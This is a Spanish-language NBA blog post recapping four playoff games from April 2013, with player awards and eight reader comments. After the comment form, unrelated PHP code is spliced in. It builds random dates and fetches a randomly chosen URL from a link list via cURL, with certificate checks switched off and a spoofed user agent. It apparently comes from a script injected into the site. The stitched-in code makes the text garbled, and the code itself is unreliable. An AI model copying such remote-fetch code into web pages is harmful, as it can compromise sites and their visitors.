La crónica: Por su propio peso

22 de April de 2013 por MagicJohnson32

En el AT&T de San Antonio, Lakers y Spurs disputaron un partido feo. No nos engañemos: hubo buenos momentos, como no podía ser de otra manera dados los jugadores que había sobre el parquet; pero el partido fue feo. Y así, en medio del espesor generalizado, Manu Ginóbili apareció fresco como una brisa de verano pero con el impacto de un huracán para amarrar la victoria al muelle local. Anotó 18 puntos en 18 minutos y con dos triples en el último minuto del tercer cuarto hundió la moral de los angelinos, que anoche pareció un tanto frágil. Hasta la irrupción del argentino, los Lakers se habían sostenido a duras penas y, gracias a una defensa más sólida que la que acostumbran a practicar, estaban sobreviviendo pese a la incapacidad de anotar tiros exteriores. Se hablará del excelente planteamiento defensivo de Popovich, pero Nash (al que se le notó que no está recuperado de sus problemas físicos) y compañía fallaron numerosos tiros cómodos, y otro tanto se puede decir de Pau, demasiado tibio en el poste, donde en muchas ocasiones le defendía Bonner. Sólo Howard anotó para los Lakers por encima del 50% en tiros de campo y, aunque peor aún le fue a los Spurs en ese apartado (37%), las 18 pérdidas de balón de los Lakers, en claro contraste con la magnífica circulación de los texanos, marcaron la diferencia entre unos y otros. Conforme avanzó el partido y pese a la insistencia de Coach Vino a través del twitter, los Lakers dejaron de buscar balones interiores y la victoria de los Spurs cayó por su propio peso (79-91). 

Antes, en Indianapolis, Paul George se había adueñado del choque inaugural de la serie entre Pacers y Hawks. En una temporada en la que ha dado el salto a la condición de All-Star, George firmó su primer triple en Playoffs y dominó por completo el partido. Ni siquiera necesitó estar acertado en el tiro (3/13 en tiros de campo, con 0/5 en triples) para ser el máximo anotador, reboteador y asistente. Si George lideró, el resto del equipo respondió, y otros seis jugadores locales lograron 9 puntos o más. Los Hawks no le perdieron la cara al encuentro pero parecieron carecer de los recursos suficientes para desarmar a su rival. Teague se fue hasta los 21 puntos y 7 asistencias, y tanto Smith como Horford cumplieron, pero Atlanta cedió el rebote (+16 para Indiana) y la diferencia en los tiros libres fue insalvable, con 20 más lanzados por parte local (90-107).

En Miami, Brandon Jennings descubrió que posiblemente exista un pequeño factor que no tuvo del todo en cuenta cuando pronosticó un 2-4 a favor de los Bucks. Ese “pequeño” factor es LeBron James. El alero de los Heat lanzó sólo 11 veces a canasta pero anotó en 9 ocasiones y acabó cerca del triple doble con 27 puntos, 10 rebotes y 8 asistencias. Milwaukee peleó y dio guerra a los actuales campeones durante 3 cuartos, pero en el último los Heat metieron esa marcha más que tenían guardada y se hicieron rápidamente con una ventaja que resultó definitiva (87-110). Miami no jugó su mejor partido pero aparecieron jugadores no habituales como Ray Allen (que siente que llega su momento) o Chris Andersen. Si en cada partido un par de secundarios se suma al tridente, difícil será que Brandon Jennings no se vaya de vacaciones con un 4-0.

Por último, demostración de fuerza de los Thunder ante los Houston Rockets. A los 5 minutos ya vencían por 11 puntos y aunque Houston fue capaz de acercarse a mediados del segundo cuarto, la reacción de Durant y los suyos fue tan contundente que acabaron con 29 puntos de ventaja (91-120). Durant y Westbrook fueron la punta de lanza del equipo pero hay que destacar el papel intimidatorio de Serge Ibaka, que evitó que James Harden campara a sus anchas por su zona. El escolta de los Rockets fue, junto a Patrick Berveley, el único que dio la cara por los Rockets. El resto de sus compañeros parecieron completamente superados por la situación. Malas vibraciones para el siguiente partido.

PREMIOS

MVP: En 35 minutos LeBron James anotó 27 puntos, cogió 10 rebotes y repartió 8 asistencias. Se quedó cerca de un triple-doble que sí consiguió Paul George, con 23 puntos, 11 rebotes y 12 asistencias. Ambos lideraron a sus equipos a la victoria.

Sorpresa: Llegan los Playoffs y Ray Allen se dispara. 20 puntos, 5 rebotes y 3 asistencias para un jugador que sabe que ha llegado su momento.

Decepción: Los Rockets fueron superados por todos lados. Los compañeros de James Harden decidieron no salir a jugar.

Esfuerzo en vano: Pau Gasol y Dwight Howard saben que son ellos, en ausencia de Kobe, los que han de liderar a los Lakers en estos Playoffs. En el primer partido lo hicieron con 16-16-6 de Gasol y 20-15 de Howard pero no fue suficiente para imponerse a los Spurs. Jeff Teague (21 puntos y 7 asistencias) fue el mejor de los Hawks en la derrota.

TOP-10

Comenta

8 comentarios a esta entrada

  1. rumbero dice:
    #1

    Pues ya se ha dicho casi todo del Spurs-Lakers así que poco que añadir. Yo me quedo con Ginobili que dejó casi sentenciados a los Lakers en 2 minutos brillantes. Lo que es capaz de hacer este hombre en 20 minutos si está bien…Y curioso que en la página de NBA cuando vas al partido tienes junto al boxscore y el notebook a…¡los tweets de Kobe durante el partido! Lo mejor como se rie después de que D’Antoni le llamará “fan” al ser preguntado sobre como había seguido Bryant el partido a través de Twitter. En fin, no todos lo días se entra en PO por obra y gracia de un fan

      Citar

  2. HisRoyalAirness dice:
    #2

    Pues ni rebote ni nada. Los Spurs rebotearon menos y ganaron

      Citar

  3. Oli dice:
    #3

    Primer partido de playoffs para todos los equipos y ninguna sorpresa como no espabilen los equipos visitantes, exceptuando los celtics que tiraron de orgullo y los warrios que ahora sin Lee lo van a tener muy complicado, se van a llevar un 2-0 para casa.

      Citar

  4. Simon dice:
    #4

    Más o menos lo que se esperaba, yo sólo confiaba en Memphis como visitante y ya vimos que Clippers ganó sin despeinarse. Los demás no creo que lleguen a robarse ningun partido como visitante.

      Citar

  5. Nacho dice:
    #5

    No sé no sé, en PO te meten de 30 un día, y al siguiente ganas de 1. La cosa es poder llevar un partido igualado ante un rival superior… y dar el hachazo en los minutos finales… Olympiakos es el ejemplo. Lo chungo es llevarse una serie entera. Pero salvo a los Bucks, veo a los demás con posibilidades de llevarse partidos fuera (como de perderlos en casa), incluso a Houston.

      Citar

  6. Denise dice:
    #6

    Nacho: No sé no sé, en PO te meten de 30 un día, y al siguiente ganas de 1. La cosa es poder llevar un partido igualado ante un rival superior… y dar el hachazo en los minutos finales… Olympiakos es el ejemplo. Lo chungo es llevarse una serie entera. Pero salvo a los Bucks, veo a los demás con posibilidades de llevarse partidos fuera (como de perderlos en casa), incluso a Houston.

    Agree +1

    Y Boston le echa muchos eggs pero no les veo con capacidad de ganarle más de 1 partido a NY

      Citar

  7. nba dice:
    #7

    Seguro que D’antoni debe estar maldiciendo ahora el dia que Kobe se dio de alta en twitter, …
    acaso alguien duda que pasara como los Lakers lleguen con un 2-0 al Staples …, me da a mi que se va a encontrar a Kobe sentado en su silla dando ordenes,

      Citar

  8. GreenPride dice:
    #8

    Pues segunda jornada de PO sin sobresaltos casi para los equipos que jugaban en casa.
    En el Este los Heat y su rey demostraron que están muy por encima de los Bucks y que salvo milagro la serie acabará rápido.
    Mientras en Indiana, los Pacers demostraron ser demasiado equipo para los casi siempre titubeantes Hawks y parecen también bastante superiores.
    En el Oeste, partido horrible entre Spurs y Lakers en el que dió la sensación de que los Lakers tienen poco que decir en la eliminatoria. Los exteriores con Nash aún muy tocado están a años luz de los de los Spurs y por mucho dominio interior que tengan no parece suficiente para inquietar a los Spurs, más aún si Manudo se pone el traje de Playoffs. Qué bonita serie podía haber quedado esta con Bryant en pista para los angelinos.
    Mientras en Oklahoma sólo Harden pareció estar a la altura de su ex-equipo. El resto se vio claramente superados por un equipo ultra-atlético y al que el tipo de juego que propone Houston es un caramelo. Con un fenomenal Ibaka y Westbrook&Durant en lo suyo los Thunder parecen muy por encima de los Rockets y al igual que con los Heat no parece que la eliminatoria pueda durar mucho.
    De momento decepcionantes primeros partidos y de momento yo sólo veo a Celtics o Grizzlies dando guerra a los poseedores de la ventaja de campo y ya veremos estos dos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>